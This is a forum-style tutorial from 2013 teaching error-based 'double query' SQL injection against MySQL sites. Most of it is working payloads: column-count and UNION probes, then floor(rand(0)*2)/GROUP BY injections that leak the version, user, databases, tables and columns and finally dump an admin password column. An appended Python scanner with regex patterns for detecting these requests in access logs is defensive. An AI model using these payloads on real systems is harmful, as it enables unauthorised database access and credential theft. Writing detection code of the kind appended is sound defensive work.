Sunday 3 March 2013

[tut]double query(error based blind sqli)[/tut]


DOUBLE QUERY SQLI (ERROR BASED BLIND MYSQLI)

This is my first tutorial, so I don't know how to write a tut... and sorry for the wrong English.

Let's start the tutorial.


1. Test whether the site is vulnerable to SQLi or not.

Check for MySQL injection by substituting a single quote into the variable:

Quote:http://www.site.com/index.php?page=1'

The result should look something like this:

Quote:MySQL Error: mysql_query (.......) error expretion syntax ...

2. Find the number of columns

To find the number of columns we use the ORDER BY statement (it tells the database how to order the result).

Increment the number until we get an error:

http://www.site.com/news.php?id=5+order+by+1+--+ (no error)

http://www.site.com/news.php?id=5+order+by+2+--+ (no error)

http://www.site.com/news.php?id=5+order+by+3+--+ (no error)

http://www.site.com/news.php?id=5+order+by+4+--+ (no error )

http://www.site.com/news.php?id=5+order+by+5+--+ (error: we get a message like Unknown column '4' in 'order clause' or something like that)

That means the query has 4 columns, because we got an error on 5.

3. Check for UNION

With UNION we can select more data in one SQL statement.

So we have

http://www.site.com/news.php?id=-5+union...,2,3,4+--+ (we already found in section 2 that the number of columns is 3).

If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works. If UNION works, we don't need double query.

If it gives an error like this

Quote:THE SELECT STATEMENT HAVE DIFFERENT NUMBER OF COLUMN...................etc

now is the time to use double query to get some information. : )

Why double query works: floor(rand(0)*2) is not random when seeded with 0, it repeats the same 0/1 sequence, so GROUP BY on it tries to insert the same key twice into its temporary table and MySQL fails with a "Duplicate entry" error that echoes the key. Because we built that key with concat() around the value we asked for, the value appears inside the error message the page prints.

4. Find the current database, current user, version, etc.

To find version():

Here is the code:

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'5.0.91-community'~1' for key 1

To find database():

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name'~1' for key 1



To count how many databases there are and then get the names of the dbs:

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:

Quote:Duplicate entry '~'number of db'~1' for key 1


To print all dbs one by one, use this code:

Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Keep incrementing the N in "LIMIT N,1":
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1 ..... for as long as you keep getting a response.

Example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1





To find user():

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'database_name@localhost'~1' for key 1





5. Count the number of tables in the selected database and print the tables one by one

To count the tables in the selected db:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE: before doing this, convert your db name to hex, because it is used here in the code: "table_schema=0xhex_code_of_database_name_which_u_selected"

Output:
Quote:Duplicate entry '~'number_of_table(e.g 10)'~1' for key 1



Now to print the table names one by one:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now suppose the db has 10 tables and you want all the table names; do this in the above code:

Keep incrementing the N in "LIMIT N,1" up to 10 times:
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
.
LIMIT 10,1 and you get all the table names of the selected db.

6. Get the number of columns in the selected table and print the column names that are in the table

To count the columns in the selected table:

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE: before applying this, look at this part of the code: "table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name". Convert your table_name and db_name to hex.


Example:
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0x074a24c45 AND table_name=0x074a24c4523d1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'number_of_column(e.g 5)'~1' for key 1



Now it is time to print the column names that are in the table, one by one.

Here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now suppose the table has 5 columns and you want all the column names; do this:

Keep incrementing the N in "LIMIT N,1" up to 5 times:
LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
.
LIMIT 5,1 and you get all the column names of the selected table.

Example (note the 0x prefix on both hex values, which is required):
Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x074a24c45 AND table_name=0x074a24c4523d1 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

7. Final step: fetch records from a selected column

Now we know everything: the table_name and the column_name.

To fetch out the data, here is the code:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Note: keep incrementing the N here in the code ("LIMIT N,1") for as long as you get a result.

Example:
Suppose the db name is "sandeep_1024", the table name is "admin" (which is in db sandeep_1024) and the column name is "password" (which is in table admin). Now we want the password, so we use the code like this:

Quote:http://www.site.com/news.php?id=5 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(admin.password as char),0x27,0x7e) FROM `sandeep_1024`.admin LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Output:
Quote:Duplicate entry '~'hack forums~1' for key 1
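As an added example that is not part of the original tutorial, here is a small Python detector for the request shapes walked through in steps 2 to 7: it URL-decodes the query string of Apache-style access log lines and flags the ORDER BY column-count probe, the UNION probe, and the floor(rand(0)*2)/GROUP BY double-query signature with its 0x7e/0x27 markers. The log lines are constructed and the regexes are my own assumptions about the payload shape, not anything the page provides.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log lines (not real traffic): a normal request,
# an ORDER BY column-count probe, and the double-query version() payload from this page.
SAMPLE_LOG = [
    '10.0.0.7 - - [03/Mar/2013:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 512',
    '10.0.0.7 - - [03/Mar/2013:10:00:02 +0000] "GET /news.php?id=5+order+by+5+--+ HTTP/1.1" 500 230',
    '10.0.0.7 - - [03/Mar/2013:10:00:03 +0000] "GET /news.php?id=5+and(select+1+from(select+count(*),'
    'concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables'
    '+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 HTTP/1.1" 500 310',
]

# Signatures of the technique walked through above, matched against the lowercased,
# URL-decoded, whitespace-collapsed query string (so '+', %20 and %0a spacing all match).
SIGNATURES = {
    # floor(rand(0)*2) feeding a GROUP BY is the duplicate-key trick itself
    "double_query_group_by": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.S),
    # 0x7e / 0x27 (~ and ') markers wrapped around the value to leak
    "tilde_markers": re.compile(r"concat\s*\(\s*0x7e\s*,\s*0x27"),
    "schema_enumeration": re.compile(r"information_schema\.(schemata|tables|columns)"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--"),
    "union_probe": re.compile(r"\bunion\b.*\bselect\b", re.S),
}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def normalize_query(url):
    """URL-decode the query string and collapse whitespace before matching."""
    decoded = unquote_plus(urlsplit(url).query)
    return re.sub(r"\s+", " ", decoded).lower()

def classify(line):
    """Return (ip, path, [signature names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = normalize_query(m.group("url"))
    hits = [name for name, pat in SIGNATURES.items() if pat.search(query)]
    return m.group("ip"), urlsplit(m.group("url")).path, hits

def scan(lines):
    """Keep only the parsed lines that hit at least one signature."""
    return [r for r in (classify(line) for line in lines) if r and r[2]]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ",".join(hits))
```

A 500 status on a request that hits the double-query signature is the telling combination, since the technique only leaks data when the application echoes the MySQL error back to the client.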


